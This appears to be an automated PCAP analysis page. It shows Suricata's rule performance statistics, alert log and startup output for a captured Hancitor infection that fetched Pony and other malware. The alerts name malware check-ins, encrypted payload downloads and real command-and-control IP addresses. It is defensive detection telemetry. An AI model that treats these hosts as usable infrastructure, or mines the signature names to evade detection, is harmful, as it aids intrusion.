Filename: 2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 22.129983902 seconds
Hash: 53c8dfa5c61083990e65afc5c20decf4
Uploaded: 1553845426

Logfiles


suricata-4.0.0-etpro-all-perf.txt-2019-03-29-T-07-44-08-03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap.txt - (59862 bytes) - download
  --------------------------------------------------------------------------
  Date: 3/29/2019 -- 07:44:08. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820923      1        2        4718337      4.10   13       0        4537117     362949.00   0.00        362949.00  
  2        2809306      1        4        3399842      2.96   50       0        561704      67996.84    0.00        67996.84   
  3        2820158      1        2        8328912      7.25   46       0        522266      181063.30   0.00        181063.30  
  4        2820157      1        2        8052760      7.01   46       0        460111      175060.00   0.00        175060.00  
  5        2811745      1        4        7391337      6.43   29       0        429093      254873.69   0.00        254873.69  
  6        2020865      1        3        3891456      3.39   29       0        379672      134188.14   0.00        134188.14  
  7        2815453      1        4        1032595      0.90   3        0        371732      344198.33   0.00        344198.33  
  8        2819664      1        2        4301627      3.74   26       0        304340      165447.19   0.00        165447.19  
  9        2819930      1        2        4214795      3.67   26       0        297056      162107.50   0.00        162107.50  
  10       2017194      1        3        362868       0.32   2        0        261937      181434.00   0.00        181434.00  
  11       2017195      1        3        360934       0.31   2        0        260960      180467.00   0.00        180467.00  
  12       2819940      1        3        2522865      2.19   15       0        237259      168191.00   0.00        168191.00  
  13       2816510      1        3        2550082      2.22   15       0        236848      170005.47   0.00        170005.47  
  14       2815263      1        3        595723       0.52   4        0        178149      148930.75   0.00        148930.75  
  15       2012520      1        7        170935       0.15   1        1        170935      170935.00   170935.00   0.00       
  16       2018342      1        2        860078       0.75   7        0        141304      122868.29   0.00        122868.29  
  17       2021774      1        2        485006       0.42   5        0        137232      97001.20    0.00        97001.20   
  18       2804907      1        3        523462       0.46   10       0        121569      52346.20    0.00        52346.20   
  19       2816509      1        2        382465       0.33   4        0        112134      95616.25    0.00        95616.25   
  20       2803027      1        6        1116154      0.97   19       0        111519      58744.95    0.00        58744.95   
  21       2816910      1        2        559380       0.49   9        0        107205      62153.33    0.00        62153.33   
  22       2804911      1        3        547086       0.48   8        0        106980      68385.75    0.00        68385.75   
  23       2819939      1        2        380231       0.33   4        0        101409      95057.75    0.00        95057.75   
  24       2801929      1        7        1024748      0.89   19       0        97743       53934.11    0.00        53934.11   
  25       2803657      1        5        422003       0.37   8        0        97371       52750.38    0.00        52750.38   
  26       2816940      1        2        524627       0.46   9        0        93857       58291.89    0.00        58291.89   
  27       2802044      1        4        92811        0.08   1        0        92811       92811.00    0.00        92811.00   
  28       2022303      1        3        112382       0.10   5        1        89265       22476.40    89265.00    5779.25    
  29       2801930      1        7        1009320      0.88   19       0        88452       53122.11    0.00        53122.11   
  30       2821561      1        2        236227       0.21   6        0        87862       39371.17    0.00        39371.17   
  31       2816927      1        3        374889       0.33   9        0        87654       41654.33    0.00        41654.33   
  32       2815254      1        7        292439       0.25   5        0        85300       58487.80    0.00        58487.80   
  33       2802991      1        5        330117       0.29   7        0        84786       47159.57    0.00        47159.57   
  34       2804927      1        2        410523       0.36   10       0        81886       41052.30    0.00        41052.30   
  35       2802987      1        5        907973       0.79   24       0        79873       37832.21    0.00        37832.21   
  36       2802067      1        6        77735        0.07   1        0        77735       77735.00    0.00        77735.00   
  37       2014411      1        11       139733       0.12   2        2        76724       69866.50    69866.50    0.00       
  38       2802043      1        3        74570        0.06   1        0        74570       74570.00    0.00        74570.00   
  39       2020855      1        3        311656       0.27   7        0        74301       44522.29    0.00        44522.29   
  40       2022502      1        4        335671       0.29   8        0        72487       41958.88    0.00        41958.88   
  41       2816669      1        4        173515       0.15   6        0        69644       28919.17    0.00        28919.17   
  42       2811740      1        2        201027       0.17   7        0        69290       28718.14    0.00        28718.14   
  43       2816909      1        2        513879       0.45   9        0        68991       57097.67    0.00        57097.67   
  44       2816931      1        3        313767       0.27   9        0        68707       34863.00    0.00        34863.00   
  45       2804906      1        3        535159       0.47   11       0        67282       48650.82    0.00        48650.82   
  46       2819881      1        2        98391        0.09   2        0        62715       49195.50    0.00        49195.50   
  47       2009702      1        5        160132       0.14   10       0        61309       16013.20    0.00        16013.20   
  48       2025064      1        5        362375       0.32   9        0        61261       40263.89    0.00        40263.89   
  49       2830425      1        1        239666       0.21   5        0        59526       47933.20    0.00        47933.20   
  50       2819978      1        5        59510        0.05   1        1        59510       59510.00    59510.00    0.00       
  51       2022842      1        5        58603        0.05   1        0        58603       58603.00    0.00        58603.00   
  52       2820592      1        3        58506        0.05   1        0        58506       58506.00    0.00        58506.00   
  53       2816895      1        2        57858        0.05   1        0        57858       57858.00    0.00        57858.00   
  54       2816928      1        3        324022       0.28   9        0        57401       36002.44    0.00        36002.44   
  55       2811277      1        7        77696        0.07   2        0        57104       38848.00    0.00        38848.00   
  56       2801861      1        1        123327       0.11   3        0        56671       41109.00    0.00        41109.00   
  57       2022339      1        2        107238       0.09   2        0        56062       53619.00    0.00        53619.00   
  58       2022609      1        2        241085       0.21   6        0        55653       40180.83    0.00        40180.83   
  59       2017552      1        6        3932641      3.42   280      0        55419       14045.15    0.00        14045.15   
  60       2809363      1        3        161069       0.14   3        0        54489       53689.67    0.00        53689.67   
  61       2021418      1        9        134659       0.12   3        0        54317       44886.33    0.00        44886.33   
  62       2810889      1        3        135410       0.12   4        0        53769       33852.50    0.00        33852.50   
  63       2024775      1        1        128446       0.11   27       0        53361       4757.26     0.00        4757.26    
  64       2019094      1        5        160043       0.14   5        0        51799       32008.60    0.00        32008.60   
  65       2816930      1        4        313858       0.27   9        0        51725       34873.11    0.00        34873.11   
  66       2822979      1        3        51665        0.04   1        0        51665       51665.00    0.00        51665.00   
  67       2824971      1        3        93323        0.08   2        0        51225       46661.50    0.00        46661.50   
  68       2820851      1        5        320996       0.28   9        0        50701       35666.22    0.00        35666.22   
  69       2017259      1        12       50613        0.04   1        0        50613       50613.00    0.00        50613.00   
  70       2811276      1        7        50547        0.04   1        0        50547       50547.00    0.00        50547.00   
  71       2816356      1        2        283732       0.25   7        0        50021       40533.14    0.00        40533.14   
  72       2828060      1        4        110593       0.10   3        0        49982       36864.33    0.00        36864.33   
  73       2013250      1        3        49913        0.04   1        0        49913       49913.00    0.00        49913.00   
  74       2816929      1        4        346683       0.30   9        0        49709       38520.33    0.00        38520.33   
  75       2021605      1        4        103783       0.09   4        0        48640       25945.75    0.00        25945.75   
  76       2019141      1        3        189909       0.17   5        0        48622       37981.80    0.00        37981.80   
  77       2821471      1        2        131507       0.11   3        0        48403       43835.67    0.00        43835.67   
  78       2022552      1        2        242036       0.21   10       0        48386       24203.60    0.00        24203.60   
  79       2811275      1        8        48382        0.04   1        0        48382       48382.00    0.00        48382.00   
  80       2820983      1        5        48298        0.04   1        0        48298       48298.00    0.00        48298.00   
  81       2807970      1        8        129514       0.11   3        0        48208       43171.33    0.00        43171.33   
  82       2022901      1        2        131541       0.11   3        0        48185       43847.00    0.00        43847.00   
  83       2016858      1        10       94816        0.08   2        0        47688       47408.00    0.00        47408.00   
  84       2810991      1        4        47644        0.04   1        0        47644       47644.00    0.00        47644.00   
  85       2022503      1        2        82668        0.07   2        0        47475       41334.00    0.00        41334.00   
  86       2826281      1        2        109941       0.10   5        0        47375       21988.20    0.00        21988.20   
  87       2810607      1        8        191482       0.17   5        0        47330       38296.40    0.00        38296.40   
  88       2819790      1        3        81790        0.07   2        0        47304       40895.00    0.00        40895.00   
  89       2024771      1        1        2728566      2.37   505      0        47263       5403.10     0.00        5403.10    
  90       2819993      1        2        46574        0.04   1        0        46574       46574.00    0.00        46574.00   
  91       2023315      1        2        81113        0.07   2        0        46338       40556.50    0.00        40556.50   
  92       2806802      1        2        1793095      1.56   91       0        45960       19704.34    0.00        19704.34   
  93       2815659      1        3        166225       0.14   4        4        45474       41556.25    41556.25    0.00       
  94       2815886      1        2        138309       0.12   4        0        45193       34577.25    0.00        34577.25   
  95       2017748      1        6        636393       0.55   42       0        45143       15152.21    0.00        15152.21   
  96       2802035      1        4        45087        0.04   1        0        45087       45087.00    0.00        45087.00   
  97       2815476      1        6        45073        0.04   1        0        45073       45073.00    0.00        45073.00   
  98       2815477      1        6        44557        0.04   1        0        44557       44557.00    0.00        44557.00   
  99       2018452      1        15       80017        0.07   2        0        44484       40008.50    0.00        40008.50   
  100      2811399      1        2        141563       0.12   4        0        44290       35390.75    0.00        35390.75   
  101      2828122      1        2        79962        0.07   2        0        44233       39981.00    0.00        39981.00   
  102      2821839      1        2        44189        0.04   1        0        44189       44189.00    0.00        44189.00   
  103      2016537      1        2        3822713      3.33   271      0        44062       14105.95    0.00        14105.95   
  104      2815478      1        5        77505        0.07   2        0        44014       38752.50    0.00        38752.50   
  105      2802177      1        3        43997        0.04   1        0        43997       43997.00    0.00        43997.00   
  106      2804157      1        4        43923        0.04   1        0        43923       43923.00    0.00        43923.00   
  107      2816922      1        5        290408       0.25   9        0        43789       32267.56    0.00        32267.56   
  108      2811274      1        7        43682        0.04   1        0        43682       43682.00    0.00        43682.00   
  109      2804921      1        6        43667        0.04   1        1        43667       43667.00    43667.00    0.00       
  110      2816327      1        4        308189       0.27   9        0        43548       34243.22    0.00        34243.22   
  111      2804158      1        3        43388        0.04   1        0        43388       43388.00    0.00        43388.00   
  112      2014380      1        4        132826       0.12   6        0        43190       22137.67    0.00        22137.67   
  113      2025086      1        6        43093        0.04   1        1        43093       43093.00    43093.00    0.00       
  114      2021413      1        2        112999       0.10   3        0        42891       37666.33    0.00        37666.33   
  115      2024767      1        2        77772        0.07   2        0        42428       38886.00    0.00        38886.00   
  116      2815363      1        3        42373        0.04   1        0        42373       42373.00    0.00        42373.00   
  117      2016726      1        6        42342        0.04   1        0        42342       42342.00    0.00        42342.00   
  118      2816525      1        10       300298       0.26   9        0        41601       33366.44    0.00        33366.44   
  119      2824975      1        2        123961       0.11   4        0        41394       30990.25    0.00        30990.25   
  120      2024601      1        2        41290        0.04   1        0        41290       41290.00    0.00        41290.00   
  121      2815475      1        6        41170        0.04   1        0        41170       41170.00    0.00        41170.00   
  122      2827575      1        2        104468       0.09   3        0        41118       34822.67    0.00        34822.67   
  123      2017261      1        3        123072       0.11   3        0        41104       41024.00    0.00        41024.00   
  124      2814883      1        3        40893        0.04   1        0        40893       40893.00    0.00        40893.00   
  125      2824549      1        2        1

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-alert-2019-03-29-T-07-44-08-03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap.txt - (2365 bytes) - download
12/20/2018-15:22:54.942662  [**] [1:2019837:3] ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 47.90.254.148:80 -> 10.12.20.101:49169
12/20/2018-15:22:55.062240  [**] [1:2810419:1] ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 47.90.254.148:80 -> 10.12.20.101:49169
12/20/2018-15:22:55.229956  [**] [1:2022303:3] ET TROJAN ASCII Executable Inside of MSCOFF File DL Over HTTP [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 47.90.254.148:80 -> 10.12.20.101:49169
12/20/2018-15:25:47.005825  [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.12.20.101:49172 -> 54.243.123.39:80
12/20/2018-15:25:48.598795  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.20.101:49173 -> 217.23.139.203:80
12/20/2018-15:25:49.015213  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.40.149.34:80 -> 10.12.20.101:49174
12/20/2018-15:25:55.561158  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.20.101:49175 -> 217.23.139.203:80
12/20/2018-15:25:56.671823  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.40.149.34:80 -> 10.12.20.101:49174
12/20/2018-15:25:56.893770  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.40.149.34:80 -> 10.12.20.101:49174
12/20/2018-15:25:57.045347  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.20.101:49176 -> 217.23.139.203:80
12/20/2018-15:25:57.264813  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.40.149.34:80 -> 10.12.20.101:49174


suricata-report-2019-03-29-T-07-44-08-03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap.txt - (17785 bytes) - download
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/53c8dfa5c61083990e65afc5c20decf456b33745cb75ec8c950e11a498e082d2 -r /var/pcap/03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap -vvv -k none
elapsedtime:21.230736
stderr:
stdout:
29/3/2019 -- 07:43:47 - <Info> - Configuration node 'rule-files' redefined.
29/3/2019 -- 07:43:47 - <Notice> - This is Suricata version 4.0.0 RELEASE
29/3/2019 -- 07:43:47 - <Info> - CPUs/cores online: 1
29/3/2019 -- 07:43:47 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 34377 and 'request-body-inspect-window' set to 15742 after randomization.
29/3/2019 -- 07:43:47 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33451 and 'response-body-inspect-window' set to 17182 after randomization.
29/3/2019 -- 07:43:47 - <Config> - DNS request flood protection level: 500
29/3/2019 -- 07:43:47 - <Config> - DNS per flow memcap (state-memcap): 524288
29/3/2019 -- 07:43:47 - <Config> - DNS global memcap: 16777216
29/3/2019 -- 07:43:47 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
29/3/2019 -- 07:43:47 - <Config> - preallocated 1000 hosts of size 136
29/3/2019 -- 07:43:47 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
29/3/2019 -- 07:43:47 - <Config> - using magic-file /usr/share/file/magic
29/3/2019 -- 07:43:47 - <Config> - Core dump size is unlimited.
29/3/2019 -- 07:43:47 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
29/3/2019 -- 07:43:47 - <Config> - preallocated 1000 defrag trackers of size 168
29/3/2019 -- 07:43:47 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
29/3/2019 -- 07:43:47 - <Config> - stream "prealloc-sessions": 2048 (per thread)
29/3/2019 -- 07:43:47 - <Config> - stream "memcap": 33554432
29/3/2019 -- 07:43:47 - <Config> - stream "midstream" session pickups: disabled
29/3/2019 -- 07:43:47 - <Config> - stream "async-oneside": disabled
29/3/2019 -- 07:43:47 - <Config> - stream "checksum-validation": disabled
29/3/2019 -- 07:43:47 - <Config> - stream."inline": disabled
29/3/2019 -- 07:43:47 - <Config> - stream "bypass": disabled
29/3/2019 -- 07:43:47 - <Config> - stream "max-synack-queued": 5
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "memcap": 134217728
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "depth": 0
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "toserver-chunk-size": 2492
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "toclient-chunk-size": 2462
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly.raw: enabled
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "segment-prealloc": 2048
29/3/2019 -- 07:43:47 - <Config> - Delayed detect disabled
29/3/2019 -- 07:43:47 - <Config> - pattern matchers: MPM: ac, SPM: bm
29/3/2019 -- 07:43:47 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
29/3/2019 -- 07:43:47 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
29/3/2019 -- 07:43:47 - <Config> - prefilter engines: MPM
29/3/2019 -- 07:43:47 - <Config> - IP reputation disabled
29/3/2019 -- 07:43:47 - <Perf> - Registered 148 keyword profiling counters.
29/3/2019 -- 07:43:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
29/3/2019 -- 07:43:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
29/3/2019 -- 07:43:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
29/3/2019 -- 07:43:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
29/3/2019 -- 07:43:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
29/3/2019 -- 07:43:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
29/3/2019 -- 07:43:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
29/3/2019 -- 07:43:52 - <Config> - No rules loaded from ET-icmp.rules.
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
29/3/2019 -- 07:43:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
29/3/2019 -- 07:43:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
29/3/2019 -- 07:43:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
29/3/2019 -- 07:43:56 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
29/3/2019 -- 07:43:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
29/3/2019 -- 07:43:59 - <Config> - No rules loaded from local.rules.
29/3/2019 -- 07:43:59 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
29/3/2019 -- 07:43:59 - <Info> - Threshold config parsed: 0 rule(s) found
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tcp-packet
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tcp-stream
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for udp-packet
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for other-ip
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_uri
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_request_line
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_client_body
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_response_line
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_header
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_header
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_header_names
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_header_names
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_accept
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_accept_enc
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_accept_lang
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_referer
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_connection
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_content_len
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_content_len
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_content_type
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_content_type
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_protocol
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_protocol
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_start
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_start
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_raw_header
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_raw_header
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_method
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_cookie
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_cookie
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_raw_uri
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_user_agent
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_host
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_raw_host
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_stat_msg
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_stat_code
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for dns_query
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tls_sni
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tls_cert_issuer
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tls_cert_subject
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tls_cert_serial
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for dce_stub_data
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for dce_stub_data
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for ssh_protocol
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for ssh_protocol
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for ssh_software
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for ssh_software
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for file_data
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for file_data
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_request_line
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_response_line
29/3/2019 -- 07:43:59 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
29/3/2019 -- 07:43:59 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
29/3/2019 -- 07:43:59 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
29/3/2019 -- 07:44:00 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
29/3/2019 -- 07:44:00 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
29/3/2019 -- 07:44:00 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
29/3/2019 -- 07:44:00 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
29/3/2019 -- 07:44:00 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
29/3/2019 -- 07:44:04 - <Perf> - Unique rule groups: 104
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toserver TCP packet": 35
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toclient TCP packet": 17
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toserver TCP stream": 33
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toclient TCP stream": 19
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toserver UDP packet": 27
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toclient UDP packet": 17
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "other IP packet": 3
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_uri": 14
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_request_line": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_client_body": 6
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_response_line": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_header": 10
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_header": 6
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_header_names": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_accept": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_referer": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_content_len": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_content_type": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_content_type": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_protocol": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_start": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_method": 5
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_cookie": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_cookie": 2
